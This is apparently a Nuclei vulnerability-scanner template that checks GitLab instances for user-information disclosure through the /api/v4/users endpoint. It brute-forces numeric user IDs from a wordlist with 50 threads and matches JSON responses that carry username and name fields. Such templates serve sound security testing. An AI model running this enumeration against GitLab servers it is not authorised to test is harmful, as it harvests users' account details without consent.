id: gitlab-user-open-api

info:
  author: Suman_Kar
  name: GitLab - User Information Disclosure Via Open API
  severity: medium
  tags: gitlab,disclosure
  reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158

requests:
  - raw:
      - |
        GET /api/v4/users/{{uid}} HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}

    payloads:
      uid: helpers/wordlists/numbers.txt
    attack: sniper
    threads: 50

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "username.*"
          - "id.*"
          - "name.*"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200